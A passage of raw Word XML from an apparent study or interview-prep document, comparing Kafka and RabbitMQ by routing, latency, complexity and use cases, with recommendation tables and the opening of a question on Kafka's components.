            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="2D8706DB" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77D648B9"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72B0E30E"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Simple pub-sub with partitioning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0703880D"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Rich routing with exchanges (direct, fanout, topic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="409AF92C" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="301ED8E0"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use case fit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A72D0A2"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Real-time analytics, data pipelines, logs, IoT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11BAA6BA"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Task queues, short-lived jobs, transactional systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="4D20C250" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1455F164"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401A4C17"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Millisecond-level (higher than RabbitMQ)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BE5E220"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Very low (suitable for real-time communication)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="135C57BF" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CCB44FC"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D227428"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Requires more setup (brokers, zookeeper or quorum)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4DCED8B4"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Easier to set up</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="70BEF57C" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="589EF282"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Consumer Scaling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64CA40F0"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Partition-based parallelism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E2A1D9D"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Competing consumers for queues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="19F32EA9" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DC9400"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Maturity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7126AAE0"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Designed by LinkedIn, optimized for throughput</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73763C46"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Mature AMQP implementation, widely adopted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2151CC28" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005C743A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="065B8FE6">
          <v:rect id="_x0000_i3063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11EE4D" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">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Which to Choose?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFDCA8" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">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Choose Kafka if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F10D53" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>high throughput</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distributed data streaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298D907" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You want </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message replay</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fault-tolerance</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event sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCAE45E" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="228"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You're working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>big data</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microservices</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IoT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA7C9AF" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">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Choose RabbitMQ if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F108D4" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, quick and reliable </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC8714" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex routing requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prioritized queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F06F0D7" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You're handling </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>task queues</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background jobs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RPC-like</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78525B7E" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005C743A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="01AC1019">
          <v:rect id="_x0000_i3064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8CE67D" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Real-World Examp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96"/>
        <w:gridCol w:w="1700"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="1DC9CDFD" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A730AAC" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="00D37B2B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6D4A58" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="00D37B2B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="1A50DDF2" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61F02957"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Logging platform / Metrics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556EE4EB"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Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="406B81FD" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B5F46D6"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Chat application / Notification system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="012D42E2"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RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="73DE47E6" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77668EFD"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ETL Pipelines / Real-time dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3488818A"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Kafka</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C743A" w:rsidRPr="00CE4B95" w14:paraId="3DFEED88" w14:textId="77777777" w:rsidTr="005C743A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3179284F"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Email sending service / Order processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="100C2BF4" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77EB5597" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005C743A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="40F242A2">
          <v:rect id="_x0000_i3065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C022E93" w14:textId="77777777" w:rsidR="005C743A" w:rsidRPr="00CE4B95" w:rsidRDefault="005C743A" w:rsidP="005C743A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E54F97" w14:textId="5D288015" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="761" w:name="_Toc196308241"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the key components of Kafka (Producer, Consumer, Broker, Topic, Partition, and Consumer Group) and how they interact in a Kafka-based system?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="761"/>
    </w:p>
    <w:p w14:paraId="022B00F7" w14:textId="3DE1C987" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
